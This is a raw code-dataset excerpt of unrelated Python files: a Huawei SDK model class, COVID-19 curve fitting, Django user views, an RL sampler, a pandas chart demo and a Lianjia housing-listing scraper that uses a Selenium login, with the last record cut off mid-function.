ImportFunctionResponse.\n\n 依赖id列表\n\n :return: The depend_list of this ImportFunctionResponse.\n :rtype: list[str]\n \"\"\"\n return self._depend_list\n\n @depend_list.setter\n def depend_list(self, depend_list):\n \"\"\"Sets the depend_list of this ImportFunctionResponse.\n\n 依赖id列表\n\n :param depend_list: The depend_list of this ImportFunctionResponse.\n :type depend_list: list[str]\n \"\"\"\n self._depend_list = depend_list\n\n @property\n def depend_version_list(self):\n \"\"\"Gets the depend_version_list of this ImportFunctionResponse.\n\n 依赖版本id列表\n\n :return: The depend_version_list of this ImportFunctionResponse.\n :rtype: list[str]\n \"\"\"\n return self._depend_version_list\n\n @depend_version_list.setter\n def depend_version_list(self, depend_version_list):\n \"\"\"Sets the depend_version_list of this ImportFunctionResponse.\n\n 依赖版本id列表\n\n :param depend_version_list: The depend_version_list of this ImportFunctionResponse.\n :type depend_version_list: list[str]\n \"\"\"\n self._depend_version_list = depend_version_list\n\n @property\n def strategy_config(self):\n \"\"\"Gets the strategy_config of this ImportFunctionResponse.\n\n :return: The strategy_config of this ImportFunctionResponse.\n :rtype: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n \"\"\"\n return self._strategy_config\n\n @strategy_config.setter\n def strategy_config(self, strategy_config):\n \"\"\"Sets the strategy_config of this ImportFunctionResponse.\n\n :param strategy_config: The strategy_config of this ImportFunctionResponse.\n :type strategy_config: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n \"\"\"\n self._strategy_config = strategy_config\n\n @property\n def extend_config(self):\n \"\"\"Gets the extend_config of this ImportFunctionResponse.\n\n 函数扩展配置。\n\n :return: The extend_config of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._extend_config\n\n @extend_config.setter\n def extend_config(self, extend_config):\n \"\"\"Sets the extend_config of this ImportFunctionResponse.\n\n 函数扩展配置。\n\n :param extend_config: The extend_config of this ImportFunctionResponse.\n :type extend_config: str\n \"\"\"\n self._extend_config = extend_config\n\n @property\n def initializer_handler(self):\n \"\"\"Gets the initializer_handler of this ImportFunctionResponse.\n\n 函数初始化入口,规则:xx.xx,必须包含“. ”。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n\n :return: The initializer_handler of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._initializer_handler\n\n @initializer_handler.setter\n def initializer_handler(self, initializer_handler):\n \"\"\"Sets the initializer_handler of this ImportFunctionResponse.\n\n 函数初始化入口,规则:xx.xx,必须包含“. ”。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n\n :param initializer_handler: The initializer_handler of this ImportFunctionResponse.\n :type initializer_handler: str\n \"\"\"\n self._initializer_handler = initializer_handler\n\n @property\n def initializer_timeout(self):\n \"\"\"Gets the initializer_timeout of this ImportFunctionResponse.\n\n 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n\n :return: The initializer_timeout of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._initializer_timeout\n\n @initializer_timeout.setter\n def initializer_timeout(self, initializer_timeout):\n \"\"\"Sets the initializer_timeout of this ImportFunctionResponse.\n\n 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n\n :param initializer_timeout: The initializer_timeout of this ImportFunctionResponse.\n :type initializer_timeout: int\n \"\"\"\n self._initializer_timeout = initializer_timeout\n\n @property\n def enterprise_project_id(self):\n \"\"\"Gets the enterprise_project_id of this ImportFunctionResponse.\n\n 企业项目ID,在企业用户创建函数时必填。\n\n :return: The enterprise_project_id of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._enterprise_project_id\n\n @enterprise_project_id.setter\n def enterprise_project_id(self, enterprise_project_id):\n \"\"\"Sets the enterprise_project_id of this ImportFunctionResponse.\n\n 企业项目ID,在企业用户创建函数时必填。\n\n :param enterprise_project_id: The enterprise_project_id of this ImportFunctionResponse.\n :type enterprise_project_id: str\n \"\"\"\n self._enterprise_project_id = enterprise_project_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImportFunctionResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-functiongraph/huaweicloudsdkfunctiongraph/v2/model/import_function_response.py","file_name":"import_function_response.py","file_ext":"py","file_size_in_byte":39811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149600094","text":"import pandas as pd\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport warnings\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.optimize import curve_fit\nwarnings.filterwarnings(\"ignore\")\n\n\nnazionale_df = pd.read_csv(\"dpc-covid19-ita-andamento-nazionale.csv\",parse_dates=['data'],\n index_col=['data'])\n\nprint(nazionale_df.head(5))\nprint(nazionale_df.columns)\ntotale_casi = np.array(nazionale_df['totale_casi'])\ncasi_attivi = totale_casi - nazionale_df['dimessi_guariti']\n\ndata = nazionale_df.index.values\n# convert date to unix time for fit use\ndates = pd.to_numeric(data)\n\n# totale_casi_fit = np.polyfit(dates, np.log(totale_casi), 1)\n\n\n\ndef func(x, a, b, c): # Hill sigmoidal equation from zunzun.com\n return a * np.power(x, b) / (np.power(c, b) + np.power(x, b))\n\ndef func1(x, a, b, c): # Hill sigmoidal equation from zunzun.com\n return a * np.power(x, b) / (np.power(c, b) + np.power(x, b))\n\ndef func2(x, a, b,c,d):\n return d + ((a-d)/(1+(x/c)**b))\n\ndef exp_func(x, a, b ):\n return a*np.exp(b*x)\ndef log_func(t,a,b):\n return a+b*np.log(t)\n\n# using an array of integer to calculate fit to avoid overflow\nx = np.arange(0,len(totale_casi))\n\npopt1, pcov1 = curve_fit(exp_func, x, totale_casi)\npopt2, pcov2 = curve_fit(exp_func, x, casi_attivi)\n\n\n\n# plt.figure()\n# plt.plot(x, totale_casi, 'ko', label=\"Original Data\")\n# plt.plot(x, exp_func(x, *popt1), 'r-', label=\"Fitted Curve\")\n#\n#\n# plt.legend()\n# plt.show()\n\nplt.figure()\nplt.plot(nazionale_df.index.values,nazionale_df['totale_casi'],'k',label='totale casi',marker='x')\nplt.plot(nazionale_df.index.values,casi_attivi,'b',label='casi attivi')\nplt.plot(nazionale_df.index.values, exp_func(x, *popt1), 'r-', label=\"Fitted Curve - casi totali\")\nplt.plot(nazionale_df.index.values, exp_func(x, *popt2), 'm-', label=\"Fitted Curve - casi attivi\")\n\nplt.plot(nazionale_df.index.values,nazionale_df['isolamento_domiciliare'],label='isolamento_domiciliare',marker='>')\nplt.plot(nazionale_df.index.values,nazionale_df['deceduti'],label='deceduti',marker='o')\nplt.plot(nazionale_df.index.values,nazionale_df['dimessi_guariti'],label='dimessi_guariti',marker='s')\n# plt.plot(date, totale_casi_fit,label='casi totali - fit', marker='^')\nplt.xticks(rotation=15, ha=\"right\")\nplt.legend(loc='best')\n\n# plt.show()\n# print(popt,pcov)\n\n\n\nx = np.arange(0, len(totale_casi))\n\ntry:\n fittedParameters, pcov = curve_fit(func1, x, totale_casi, maxfev=5000)\n modelPredictions = func1(x, *fittedParameters)\n\n absError = modelPredictions - totale_casi\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(totale_casi))\n\n print('Parameters:', fittedParameters)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n # create data for the fitted equation plot\n xModel = np.linspace(min(x), max(x))\n yModel = func1(xModel, *fittedParameters)\n\n # first the raw data as a scatter plot\n plt.figure()\n length = len(totale_casi)\n plt.plot(x, totale_casi, 'ko', label=\"Original Data\")\n # plt.plot(nazionale_df.index.values, totale_casi, label=\"Original Data - \" + country + ' - ' + label)\n # plt.figure()\n # now the model as a line plot\n plt.plot(xModel, yModel, label=\"Fitted Curve - casi totali\")\n\n plt.xticks(rotation=15, ha=\"right\")\n # plt.xticks(dates)\n # plt.major_formatter(mdates.DateFormatter(\"%m-%d\"))\n # plt.minor_formatter(mdates.DateFormatter(\"%m-%d\"))\n plt.legend(loc='best')\n\n plt.show()\nexcept ValueError:\n logger.error('failed to fit data')\n\n\n","sub_path":"dati-andamento-nazionale/dati_nazionali.py","file_name":"dati_nazionali.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"390871855","text":"# -*- coding: utf-8 -*-\nfrom blog.models import Blog\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import logout as django_logout, authenticate, login as django_login\nfrom users.forms import LoginForm, SignupForm\nfrom django.views.generic import View\n\n\nclass LoginView(View):\n\n def get(self, request):\n error_messages = []\n form = LoginForm()\n context = {\n 'errors': error_messages,\n 'login_form': form\n }\n return render(request, 'users/login.html', context)\n\n def post(self, request):\n error_messages = []\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('usr')\n password = form.cleaned_data.get('pwd')\n user = authenticate(username=username, password=password)\n if user is None:\n error_messages.append('Nombre de usuario o contraseña incorrectos')\n else:\n if user.is_active:\n django_login(request, user)\n url = request.GET.get('next',\n 'post_home') # si no existe el parámetro GET 'next', le mandamos a 'photos_home'\n return redirect(url)\n else:\n error_messages.append('El usuario no está activo')\n context = {\n 'errors': error_messages,\n 'login_form': form\n }\n return render(request, 'users/login.html', context)\n\n\nclass LogoutView(View):\n\n def get(self, request):\n if request.user.is_authenticated():\n django_logout(request)\n return redirect('post_home')\n\n\nclass SignupView(View):\n\n def get(self, request):\n \"\"\"\n Muesta un formulario para crear un user\n :param request: HttpRequest\n :return: HttpResponse\n \"\"\"\n form = SignupForm()\n context = {\n 'form': form,\n 'success_message': ''\n }\n return render(request, 'users/new_user.html', context)\n\n def post(self, request):\n \"\"\"\n Crea un user en base a la información POST\n :param request: HttpRequest\n :return: HttpResponse\n \"\"\"\n success_message = ''\n\n form = SignupForm(request.POST)\n if form.is_valid():\n user = User()\n user.username = form.cleaned_data.get('usr')\n user.first_name = form.cleaned_data.get('first_name')\n user.last_name = form.cleaned_data.get('last_name')\n user.email = form.cleaned_data.get('email')\n user.set_password(form.cleaned_data.get('password'))\n user.save()\n\n blog = Blog()\n blog.title = \"My first blog\"\n blog.owner = user\n blog.save()\n\n success_message = 'Creado con éxito!'\n success_message += ''.format(\n reverse('post_home', args=[])\n )\n success_message += 'go Home!'\n success_message += ''\n context = {\n 'form': form,\n 'success_message': success_message\n }\n return render(request, 'users/new_user.html', context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599028735","text":"from django import forms\nfrom . import models\n\n\nclass CreateMedia(forms.ModelForm) :\n class Meta:\n model = models.Media\n fields = [\n 'title',\n 'photo',\n 'slug',\n 'Left',\n 'Top',\n 'Right',\n 'Bottom',\n 'Resize_Width',\n 'Resize_Height',\n 'Rotate_Degree',\n 'Black_White',\n 'Share'\n ]\n\n\n","sub_path":"photo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312846783","text":"import sys\nimport statistics\n\ndef monitor(line: str) -> str:\n tokens = line.split()\n name = []\n if tokens[0].isalpha():\n while tokens[0].isalpha():\n name.append(tokens.pop(0))\n else:\n while tokens[-1].isalpha():\n name.insert(0, tokens.pop())\n\n avg_heartrate = statistics.mean(list(map(float, tokens)))\n\n return f\"{avg_heartrate} {' '.join(name)}\"\n\ndef test_1():\n assert monitor('Lisa Marie Presley 90.2 104.3 110.1 118.7 122.3') == '109.120000 Lisa Marie Presley'\n\nif __name__ == '__main__':\n for line in sys.stdin:\n print(monitor(line))\n\n# from 396.0 rank 946 to 397.7 rank 941\n","sub_path":"python/1_7/pervasiveheartmonitor.py","file_name":"pervasiveheartmonitor.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"527885161","text":"\n\nimport numpy as np\nimport tqdm\nimport mujoco_py\nimport cv2\n\n\n\nclass Sampler:\n\n def __init__(self, env, policy, max_steps=None):\n self.env = env\n self.policy = policy\n self.max_steps = max_steps\n self.returns = []\n self.total_steps = 0\n self.new_episode()\n\n def new_episode(self):\n self.policy.reset()\n self.last_ob = None\n self.current_return = 0.0\n self.current_step = 0\n\n @property\n def is_terminal(self):\n return self.last_ob is None\n\n def step(self, random=False):\n\n # Clear if done\n if self.last_ob is None:\n ob = self.env.reset()\n else:\n ob = self.last_ob\n\n # Get action and advance env\n if random:\n ac, policy_info = self.env.action_space.sample(), {}\n else:\n ac, policy_info = self.policy.get_action(ob)\n next_ob, rew, done, _ = self.env.step(ac)\n\n # Bookkeeping\n self.last_ob = next_ob\n self.current_return += rew\n self.current_step += 1\n self.total_steps += 1\n\n # Stop if done or max steps exceeded\n if done or self.max_steps and self.current_step >= self.max_steps:\n self.returns.append(self.current_return)\n self.new_episode()\n\n return dict(\n ob=ob, ac=ac, rew=rew, next_ob=next_ob, done=done, **policy_info\n )\n\n def sample_steps(self, n=None, random=False):\n data = []\n for _ in range(int(n or 1)):\n data.append(self.step(random=random))\n # If single step, convert list of dicts -> dict\n if not n:\n data = data[0]\n # Otherwise, convert list of dicts -> dicts of np.array\n else:\n data = {k: np.array([step[k] for step in data]) for k in data[0]}\n\n return data\n\n def sample_paths(self, n=None, random=False):\n paths = []\n for _ in range(int(n or 1)):\n # Reset and sample until terminal\n self.new_episode()\n data = []\n while True:\n data.append(self.step(random=random))\n if self.is_terminal:\n break\n # Convert list of dicts -> dicts of np.array\n path = {k: np.array([step[k] for step in data]) for k in data[0]}\n paths.append(path)\n return paths[0] if not n else path\n\n def evaluate(\n self, n, random=False, render=False, render_max=None, render_size=None\n ):\n rews = []\n rets = []\n lens = []\n frames = []\n self.new_episode()\n for i in range(n):\n step = self.step(random=random)\n rews.append(step['rew'])\n if render and (render_max is None or i < render_max):\n frame = self.env.render(mode='rgb_array')\n if not render_size is None:\n frame = cv2.resize(frame, render_size)\n frames.append(frame)\n if self.is_terminal:\n rets.append(sum(rews))\n lens.append(len(rews))\n rews = []\n info = {}\n info['Return'] = rets\n info['TrajLen'] = lens\n frames = np.array(frames) if render else None\n return info, frames\n\n\nclass SkillSampler(Sampler):\n\n def __init__(\n self, env, policy, num_skills, skill_dist=None, max_steps=None\n ):\n self.num_skills = num_skills\n self.skill_dist = skill_dist\n super().__init__(env, policy, max_steps=max_steps)\n\n def new_episode(self):\n super().new_episode()\n # If distribution is give, sample it\n if self.skill_dist is not None:\n self.skill = self.skill_dist()\n # Otherwise, sample uniformly\n else:\n self.skill = np.random.randint(self.num_skills)\n\n def step(self, greedy=False, skill=None):\n # Clear if done\n if self.last_ob is None:\n ob = self.env.reset()\n else:\n ob = self.last_ob\n\n # Get action conditioned on current skill and advance env\n skill = skill or self.skill\n skill_1h = np.zeros(self.num_skills, dtype=np.float32)\n skill_1h[self.skill if skill is None else skill] = 1.0\n ac = self.policy.get_action(ob, skill_1h, greedy=greedy)\n next_ob, rew, done, info = self.env.step(ac)\n\n # Bookkeeping\n self.last_ob = next_ob\n self.current_return += rew\n self.current_step += 1\n self.total_steps += 1\n\n # Stop if done or max steps exceeded\n if done or self.max_steps and self.current_step >= self.max_steps:\n self.returns.append(self.current_return)\n self.new_episode()\n\n return dict(\n ob=ob, ac=ac, rew=rew, next_ob=next_ob, done=done, skill=skill\n )\n","sub_path":"project/samplers.py","file_name":"samplers.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"358365640","text":"# coding:utf8\n\nimport numpy\nimport pandas\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\nfont = {\n \"family\": \"SimHei\"\n}\nmatplotlib.rc(\"font\", **font)\n\ndata = pandas.read_csv(\n \"E:\\Workspace\\idata\\lab_data_analysis\\data\\lab38_01\\data.csv\"\n)\n\nresult = data.pivot_table(\n values=\"月消费(元)\",\n index=\"手机品牌\",\n columns=\"通信品牌\",\n aggfunc=numpy.sum\n)\n\nindex = numpy.arange(len(result))\n# 三种颜色\nminColor = (42 / 256, 87 / 256, 141 / 256, 1 / 3)\nmidColor = (42 / 256, 87 / 256, 141 / 256, 2 / 3)\nmaxColor = (42 / 256, 87 / 256, 141 / 256, 3 / 3)\n\n# 使用排列的方式,把数据排列放好,即为多维柱形图,使用index和width来实现\nplt.bar(\n index, result[\"全球通\"],\n color=minColor, width=1 / 4\n)\nplt.bar(\n index + 1 / 4, result[\"动感地带\"],\n color=midColor, width=1 / 4\n)\nplt.bar(\n index + 2 / 4, result[\"神州行\"],\n color=maxColor, width=1 / 4\n)\nplt.xticks(index + 1 / 3, result.index)\nplt.legend([\"全球通\", \"动感地带\", \"神州行\"])\nplt.show()\n\n# 优化,对数据进行排序后绘图\nresult2 = result.sort_values(\n by=\"神州行\", ascending=False\n)\nplt.bar(\n index, result2['神州行'],\n color=maxColor, width=1 / 4\n)\nplt.bar(\n index + 1 / 4, result2['动感地带'],\n color=midColor, width=1 / 4\n)\nplt.bar(\n index + 2 / 4, result2['全球通'],\n color=minColor, width=1 / 4\n)\nplt.xticks(index + 1 / 3, result2.index)\nplt.legend(['神州行', '动感地带', '全球通'])\nplt.show()\n","sub_path":"lab_data_analysis/lab38_02.py","file_name":"lab38_02.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62826081","text":"#依赖第三方库:\n#Selenium(自动化测试工具), requests(http请求工具), BeautifulSoup(解析网页的工具),pandas()\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom itertools import islice\nfrom collections import OrderedDict\nimport pandas as pd\nimport time\nimport functools\n\n\nCommunities_Info_Col = [u'小区名称', u'大区域', u'小区域', u'建造时间', u'挂牌均价', u'在售套数', u'链接']\nProperties_Info_Col = ['小区名字', '大区域', '小区域', '建造时间', '单价','房型', '面积', '楼层', '朝向',\n '价格', '描述', '地铁', '满五', '有钥匙', '新上', '链接']\nTransitions_Info_Col = ['小区名字', '大区域', '小区域', '价格','交易时间','面积','房型', '单价', '楼层',\n '朝向', '装修', '链接']\nHome_url = u\"http://sh.lianjia.com\"\nLianjia_Account = 'your account'\nLianjia_Password = 'your password'\nCookies = None\nReq = None\n\n\ndef stop_time(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n start = time.time()\n res = f(*args, **kwargs)\n print('%s execute %s s ' % (f, time.time()-start))\n return res\n return wrapper\n\n\n@stop_time\ndef login():\n chrome_path= r\"C:\\Program Files (x86)\\chromedriver_win32\\chromedriver.exe\"\n wd = webdriver.Chrome(executable_path=chrome_path)\n login_url = 'http://passport.lianjia.com/cas/login?service=http%3A%2F%2Fuser.sh.lianjia.com%2Findex'\n wd.get(login_url)\n\n wd.find_element_by_xpath('//*[@id=\"username\"]').send_keys(Lianjia_Account)\n wd.find_element_by_xpath('//*[@id=\"password\"]').send_keys(Lianjia_Password)\n wd.find_element_by_xpath('//*[@id=\"loginUserForm\"]/ul/li[5]/button').click()\n\n req = requests.Session() #构建Session\n global Cookies\n Cookies = wd.get_cookies() #导出cookie\n\n\ndef get_req():\n global Req\n global Cookies\n if Req:\n return Req\n Req = requests.Session() # 构建Session\n for cookie in Cookies:\n Req.cookies.set(cookie['name'], cookie['value']) # 转换cookies\n return Req\n\n\ndef do_request(url):\n req = get_req()\n for i in range(5):\n try:\n res = req.get(url)\n except (ConnectionResetError, requests.exceptions.ConnectionError):\n print('open %s failed and try %sth in 5s' % (url, i+2))\n time.sleep(5)\n else:\n break\n return res\n\n\n@stop_time\ndef district_spider():\n url = u\"/xiaoqu/\"\n plain_text = do_request(Home_url + url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n area_tags = soup.find('div', {'class': 'option-list gio_district'}).findAll('a')\n big_areas = OrderedDict()\n for i in islice(area_tags, 1, len(area_tags) - 1):\n href = i.get('href')\n href = href[href.rfind('/', 0, len(href) - 1) + 1:-1]\n big_areas[href] = list()\n big_areas[href].append(i.text)\n\n plain_text = do_request(Home_url + url + href).text\n sub_area_soup = BeautifulSoup(plain_text, 'lxml')\n sub_area_tags = sub_area_soup.find('div', {'class': 'option-list sub-option-list gio_plate'}).findAll('a')\n for j in islice(sub_area_tags, 1, len(sub_area_tags)):\n sub_href = j.get('href')\n sub_href = sub_href[sub_href.rfind('/', 0, len(sub_href)-1)+1:-1]\n big_areas[href].append((sub_href, j.text))\n return big_areas\n\n\ndef xiaoqu_spider(url_page):\n \"\"\"\n 爬取页面链接中的小区信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n xiaoqu_list = soup.findAll('div', {'class': 'info-panel'})\n community_list = list()\n for xq in xiaoqu_list:\n community_info = list()\n community_info.append(xq.find('a').text)\n area_tag = xq.find('div', {'class': 'con'})\n area = area_tag.findAll('a')\n\n community_info.append(area[0].text)\n community_info.append(area[1].text)\n area_content = area_tag.text\n pattern = re.compile(r'\\s+')\n area_content = re.sub(pattern, '', area_content)\n info = re.match(r'.*|(.*)年建成', area_content)\n if info:\n community_info.append(int(info.groups()[0][-4:]))\n else:\n community_info.append(info)\n\n price = xq.find('div', {'class': 'price'}).span.text.strip()\n price = int(price) if price.isdigit() else None\n stock_num = int(xq.find('div', {'class': 'square'}).a.span.text.strip())\n href = xq.find('div', {'class': 'square'}).a.get('href')\n\n community_info.append(price)\n community_info.append(stock_num)\n community_info.append(href)\n community_list.append(community_info)\n return community_list\n\n\n@stop_time\ndef do_xiaoqu_spider(big_areas):\n \"\"\"\n 爬取大区域中的所有小区信息\n \"\"\"\n xiaoqu_url = u'/xiaoqu/'\n #查找大区域\n results = list()\n for area in big_areas.values():\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'page-box house-lst-page-box'})\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n results.extend(xiaoqu_spider(url_page))\n print('current communities %s %s %s' % (len(results), area[0], sub_area[1]))\n #process_pool.join()\n return results\n\ndef property_spider(url_page):\n \"\"\"\n 爬取页面链接中的二手房信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n xiaoqu_list = soup.findAll('div', {'class': 'info'})\n property_list = list()\n for prop in xiaoqu_list:\n\n property_info = list()\n try:\n row2 = prop.find('span', {'class':'info-col row2-text'})\n name = row2.findAll('a')\n property_info.append(name[0].text)#小区名字\n property_info.append(name[1].text) # 大区域\n property_info.append(name[2].text) # 小区域\n year = re.findall('(\\d+)年', row2.text)\n property_info.append(year[0] if year else None) #建造时间\n price_item = prop.find('span', {'class': 'info-col price-item minor'})\n price_item = re.findall('(\\d+)', price_item.text) if price_item else None\n property_info.append(price_item[0] if price_item else None) # 单价\n row1 = prop.find('span', {'class': 'info-col row1-text'})\n row1_info = re.match('\\s+(.+)\\|(.+)平\\s+\\|(.+)\\s+\\|?(.*)\\s+', row1.text)\n if not row1_info:\n print(row1.text)\n raise\n row1_info = row1_info.groups()\n property_info.append(row1_info[0])#房型\n property_info.append(row1_info[1]) # 面积\n property_info.append(row1_info[2]) # 楼层\n property_info.append(row1_info[3]) # 朝向\n\n total_price = prop.find('span', {'class': 'total-price strong-num'}).text\n property_info.append(total_price) # 价格\n\n des = prop.find('a', {'class': 'text link-hover-green js_triggerGray js_fanglist_title'})\n property_info.append(des.text) # 描述\n\n tag2s = prop.find('div', {'class': 'property-tag-container'}).findAll('span')\n str_other = ''\n for tag in tag2s:\n str_other += tag.text\n re_res = re.search(r'距离.*米', str_other)\n property_info.append(re_res.group() if re_res else None)#地铁\n\n re_res = re.search(r'满(五|二)', str_other)\n property_info.append(re_res.group() if re_res else None)#满五\n\n re_res = re.search(r'有钥匙', str_other)\n property_info.append(re_res.group() if re_res else None)#有钥匙\n\n new = prop.find('span', {'class': 'c-prop-tag c-prop-tag--blue'})\n a = 1\n property_info.append(1 if new else None)#新上\n property_info.append(des.get('href'))#链接\n except IndexError:\n raise IndexError\n property_list.append(property_info)\n return property_list\n\n\n@stop_time\ndef do_property_spider(big_areas, start=0):\n \"\"\"\n 爬取所有二手房信息\n \"\"\"\n xiaoqu_url = u'/ershoufang/'\n #查找大区域\n results = list()\n for area in islice(big_areas.values(), start, len(big_areas)):\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'c-pagination'})\n if not page_div:\n print('not find page %s %s' % (area[0], sub_area[0]))\n continue\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n results.extend(property_spider(url_page))\n #if len(results) > 100:\n #return results\n\n print('current properties %s %s %s' % (len(results), area[0], sub_area[1]))\n #process_pool.join()\n return results\n\n\ndef trans_spider(url_page):\n \"\"\"\n 爬取页面链接中的交易信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n transactions = soup.findAll('div', {'class': 'info'})\n tran_list = list()\n for tran in transactions:\n\n tran_info = list()\n try:\n trade_time = tran.find('div', {'class':'info-col deal-item main strong-num'}).text\n price = tran.find('div', {'class':'info-col price-item main'}).find('span', {'class':'strong-num'})\n price = price.text\n district_tag = tran.find('span', {'class':'row2-text'}).findAll('a')\n sub_district = district_tag[1].text\n district = district_tag[0].text\n row = tran.find('div', {'class': 'info-row'})\n xiaoqu = row.find('span', {'class': 'cj-text'}).text\n area = re.findall(' (.*)平', row.text)[0]\n room_type = re.findall('\\s+(.+室.+厅) ', row.text)[0]\n unit_price = tran.find('div', {'class':'info-col price-item minor'}).text\n unit_price = re.findall('\\d+', unit_price)[0]\n info = re.match('\\s+(.+)\\s+\\|?(.*)\\s+\\|?(.*)', tran.find('div', {'class': 'row1-text'}).text).groups()\n floor = info[0]\n aspect = info[1]\n decoration = info[2]\n\n href = tran.find('a', {'class': 'info-col text link-hover-green'}).get('href')\n\n #'小区名字', '大区域', '小区域', '价格','交易时间','面积','房型', '单价', '楼层', '朝向', '装修', 链接'\n tran_info.append(xiaoqu)\n tran_info.append(district)\n tran_info.append(sub_district)\n tran_info.append(price)\n tran_info.append(trade_time)\n tran_info.append(area)\n tran_info.append(room_type)\n tran_info.append(unit_price)\n tran_info.append(floor)\n tran_info.append(aspect)\n tran_info.append(decoration)\n tran_info.append(href)\n\n except (IndexError, AttributeError):\n print(url_page)\n print(tran.text)\n raise IndexError\n tran_list.append(tran_info)\n return tran_list\n\n\n@stop_time\ndef do_trans_spider(big_areas, start=0):\n \"\"\"\n 爬取所有交易信息\n \"\"\"\n xiaoqu_url = u'/chengjiao/'\n #查找大区域\n results = list()\n for area in islice(big_areas.values(), start, len(big_areas)):\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'c-pagination'})\n if not page_div:\n print('not find page %s %s' % (area[0], sub_area[0]))\n continue\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n 